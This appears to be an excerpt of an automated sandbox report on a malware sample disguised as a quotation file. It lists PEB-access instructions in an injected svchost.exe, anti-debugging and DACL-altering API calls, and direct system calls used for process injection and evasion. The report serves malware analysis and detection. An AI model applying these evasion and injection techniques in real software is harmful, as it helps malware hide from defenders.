                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AC6F2 mov eax, dword ptr fs:[00000030h]3_2_038AC6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904600 mov eax, dword ptr fs:[00000030h]3_2_03904600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C620 mov eax, dword ptr fs:[00000030h]3_2_0386C620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830630 mov eax, dword ptr fs:[00000030h]3_2_03830630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860630 mov eax, dword ptr fs:[00000030h]3_2_03860630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8633 mov esi, dword ptr fs:[00000030h]3_2_038B8633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8633 mov eax, dword ptr fs:[00000030h]3_2_038B8633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8633 mov eax, dword ptr fs:[00000030h]3_2_038B8633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C640 mov eax, dword ptr fs:[00000030h]3_2_0386C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C640 mov eax, dword ptr fs:[00000030h]3_2_0386C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386265C mov eax, dword ptr fs:[00000030h]3_2_0386265C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386265C mov ecx, dword ptr fs:[00000030h]3_2_0386265C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386265C mov eax, dword ptr fs:[00000030h]3_2_0386265C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386666D mov esi, dword ptr fs:[00000030h]3_2_0386666D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386666D mov eax, dword ptr fs:[00000030h]3_2_0386666D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386666D mov eax, dword ptr fs:[00000030h]3_2_0386666D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE660 mov eax, dword ptr fs:[00000030h]3_2_038BE660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830670 mov eax, dword ptr fs:[00000030h]3_2_03830670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872670 mov eax, dword ptr fs:[00000030h]3_2_03872670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872670 mov eax, dword ptr fs:[00000030h]3_2_03872670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE588 mov eax, dword ptr fs:[00000030h]3_2_038AE588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE588 mov eax, dword ptr fs:[00000030h]3_2_038AE588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A580 mov eax, dword ptr fs:[00000030h]3_2_0386A580
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A580 mov eax, dword ptr fs:[00000030h]3_2_0386A580
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862594 mov eax, dword ptr fs:[00000030h]3_2_03862594
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC592 mov eax, dword ptr fs:[00000030h]3_2_038BC592
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B85AA mov eax, dword ptr fs:[00000030h]3_2_038B85AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038345B0 mov eax, dword ptr fs:[00000030h]3_2_038345B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038345B0 mov eax, dword ptr fs:[00000030h]3_2_038345B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C5C6 mov eax, dword ptr fs:[00000030h]3_2_0386C5C6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B05C6 mov eax, dword ptr fs:[00000030h]3_2_038B05C6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038665D0 mov eax, dword ptr fs:[00000030h]3_2_038665D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A5E7 mov ebx, dword ptr fs:[00000030h]3_2_0386A5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A5E7 mov eax, dword ptr fs:[00000030h]3_2_0386A5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE5E0 mov eax, dword ptr fs:[00000030h]3_2_038DE5E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC5FC mov eax, dword ptr fs:[00000030h]3_2_038BC5FC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E507 mov eax, dword ptr fs:[00000030h]3_2_0385E507
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832500 mov eax, dword ptr fs:[00000030h]3_2_03832500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C50D mov eax, dword ptr fs:[00000030h]3_2_0386C50D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C50D mov eax, dword ptr fs:[00000030h]3_2_0386C50D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC51D mov eax, dword ptr fs:[00000030h]3_2_038BC51D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384252B mov eax, dword ptr fs:[00000030h]3_2_0384252B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872539 mov eax, dword ptr fs:[00000030h]3_2_03872539
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E547 mov eax, dword ptr fs:[00000030h]3_2_0384E547
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03866540 mov eax, dword ptr fs:[00000030h]3_2_03866540
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868540 mov eax, dword ptr fs:[00000030h]3_2_03868540
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383254C mov eax, dword ptr fs:[00000030h]3_2_0383254C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6550 mov eax, dword ptr fs:[00000030h]3_2_038C6550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA553 mov eax, dword ptr fs:[00000030h]3_2_038FA553
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384C560 mov eax, dword ptr fs:[00000030h]3_2_0384C560
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830485 mov ecx, dword ptr fs:[00000030h]3_2_03830485
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386648A mov eax, dword ptr fs:[00000030h]3_2_0386648A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386648A mov eax, dword ptr fs:[00000030h]3_2_0386648A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386648A mov eax, dword ptr fs:[00000030h]3_2_0386648A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC490 mov eax, dword ptr fs:[00000030h]3_2_038BC490
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038324A2 mov eax, dword ptr fs:[00000030h]3_2_038324A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038324A2 mov ecx, dword ptr fs:[00000030h]3_2_038324A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038644A8 mov eax, dword ptr fs:[00000030h]3_2_038644A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C84BB mov eax, dword ptr fs:[00000030h]3_2_038C84BB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E4BC mov eax, dword ptr fs:[00000030h]3_2_0386E4BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038544D1 mov eax, dword ptr fs:[00000030h]3_2_038544D1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038544D1 mov eax, dword ptr fs:[00000030h]3_2_038544D1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E4EF mov eax, dword ptr fs:[00000030h]3_2_0386E4EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E4EF mov eax, dword ptr fs:[00000030h]3_2_0386E4EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038364F0 mov eax, dword ptr fs:[00000030h]3_2_038364F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D44F8 mov eax, dword ptr fs:[00000030h]3_2_038D44F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D44F8 mov eax, dword ptr fs:[00000030h]3_2_038D44F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A4F0 mov eax, dword ptr fs:[00000030h]3_2_0386A4F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A4F0 mov eax, dword ptr fs:[00000030h]3_2_0386A4F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE4F2 mov eax, dword ptr fs:[00000030h]3_2_038BE4F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE4F2 mov eax, dword ptr fs:[00000030h]3_2_038BE4F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6400 mov eax, dword ptr fs:[00000030h]3_2_038C6400
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6400 mov eax, dword ptr fs:[00000030h]3_2_038C6400
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382640D mov eax, dword ptr fs:[00000030h]3_2_0382640D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840445 mov eax, dword ptr fs:[00000030h]3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0443 mov eax, dword ptr fs:[00000030h]3_2_038B0443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E45E mov eax, dword ptr fs:[00000030h]3_2_0385E45E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E45E mov eax, dword ptr fs:[00000030h]3_2_0385E45E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E45E mov eax, dword ptr fs:[00000030h]3_2_0385E45E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E45E mov eax, dword ptr fs:[00000030h]3_2_0385E45E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E45E mov eax, dword ptr fs:[00000030h]3_2_0385E45E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE461 mov eax, dword ptr fs:[00000030h]3_2_038BE461
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA464 mov eax, dword ptr fs:[00000030h]3_2_038FA464
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838470 mov eax, dword ptr fs:[00000030h]3_2_03838470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838470 mov eax, dword ptr fs:[00000030h]3_2_03838470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8BBE mov eax, dword ptr fs:[00000030h]3_2_038F8BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8BBE mov eax, dword ptr fs:[00000030h]3_2_038F8BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8BBE mov eax, dword ptr fs:[00000030h]3_2_038F8BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F8BBE mov eax, dword ptr fs:[00000030h]3_2_038F8BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382EBC0 mov eax, dword ptr fs:[00000030h]3_2_0382EBC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4BC0 mov eax, dword ptr fs:[00000030h]3_2_038B4BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4BC0 mov eax, dword ptr fs:[00000030h]3_2_038B4BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4BC0 mov eax, dword ptr fs:[00000030h]3_2_038B4BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4BC0 mov eax, dword ptr fs:[00000030h]3_2_038B4BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D6BDE mov ebx, dword ptr fs:[00000030h]3_2_038D6BDE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D6BDE mov eax, dword ptr fs:[00000030h]3_2_038D6BDE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03858BD1 mov eax, dword ptr fs:[00000030h]3_2_03858BD1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03858BD1 mov eax, dword ptr fs:[00000030h]3_2_03858BD1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904BE0 mov eax, dword ptr fs:[00000030h]3_2_03904BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838B10 mov eax, dword ptr fs:[00000030h]3_2_03838B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838B10 mov eax, dword ptr fs:[00000030h]3_2_03838B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838B10 mov eax, dword ptr fs:[00000030h]3_2_03838B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840B10 mov eax, dword ptr fs:[00000030h]3_2_03840B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840B10 mov eax, dword ptr fs:[00000030h]3_2_03840B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840B10 mov eax, dword ptr fs:[00000030h]3_2_03840B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840B10 mov eax, dword ptr fs:[00000030h]3_2_03840B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385EB1C mov eax, dword ptr fs:[00000030h]3_2_0385EB1C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382CB1E mov eax, dword ptr fs:[00000030h]3_2_0382CB1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CB20 mov eax, dword ptr fs:[00000030h]3_2_0386CB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BCB20 mov eax, dword ptr fs:[00000030h]3_2_038BCB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BCB20 mov eax, dword ptr fs:[00000030h]3_2_038BCB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BCB20 mov eax, dword ptr fs:[00000030h]3_2_038BCB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AB70 mov eax, dword ptr fs:[00000030h]3_2_0383AB70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836B70 mov eax, dword ptr fs:[00000030h]3_2_03836B70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836B70 mov eax, dword ptr fs:[00000030h]3_2_03836B70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836B70 mov eax, dword ptr fs:[00000030h]3_2_03836B70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904B67 mov eax, dword ptr fs:[00000030h]3_2_03904B67
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E6B77 mov eax, dword ptr fs:[00000030h]3_2_038E6B77
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03864B79 mov eax, dword ptr fs:[00000030h]3_2_03864B79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E6A80 mov eax, dword ptr fs:[00000030h]3_2_038E6A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840ACE mov eax, dword ptr fs:[00000030h]3_2_03840ACE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840ACE mov eax, dword ptr fs:[00000030h]3_2_03840ACE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4AC2 mov eax, dword ptr fs:[00000030h]3_2_038D4AC2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D0AE0 mov eax, dword ptr fs:[00000030h]3_2_038D0AE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2AE0 mov eax, dword ptr fs:[00000030h]3_2_038D2AE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2AE0 mov eax, dword ptr fs:[00000030h]3_2_038D2AE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03850AEB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03830AED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038B0AFF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03904AE8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0386AA0E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0385EA40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038CAA40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038B4A57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0386C98F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038D0980 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0383E9A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038B89A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038689B0 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038C69B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038C69B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038389C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_039029CF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038309F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038649F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03886912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03862919 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038F892E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038AC920 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038AC920 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0388693A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0390492D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0386C944 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0385E94E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03854955 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0386C958 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0384096B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03836970 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038B488F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03856882 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0387088E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0387088E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038E8890 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038288C8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038308CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0383A8F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038648F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038C88FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0386C819 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038BC870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038B8F8B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03840F90 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03834FB6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0385CFB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03868FBC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038EEFD3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038DAFD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03846FE0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03846FE0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_00120B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_000F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_000E083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_000E09D5 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe Code function: 2_2_000E0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtQueryInformationProcess: Direct from: 0x77502B46
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtResumeThread: Direct from: 0x77502EDC
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtCreateUserProcess: Direct from: 0x7750363C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtProtectVirtualMemory: Direct from: 0x77502EBC
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtDelayExecution: Direct from: 0x77502CFC
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtOpenKeyEx: Direct from: 0x77502ABC
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtSetInformationThread: Direct from: 0x774F6319
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtClose: Direct from: 0x77502A8C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtCreateKey: Direct from: 0x77502B8C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtSetInformationThread: Direct from: 0x77502A6C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtWriteVirtualMemory: Direct from: 0x7750482C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe NtAllocateVirtualMemory: Direct from: 0x7750480C
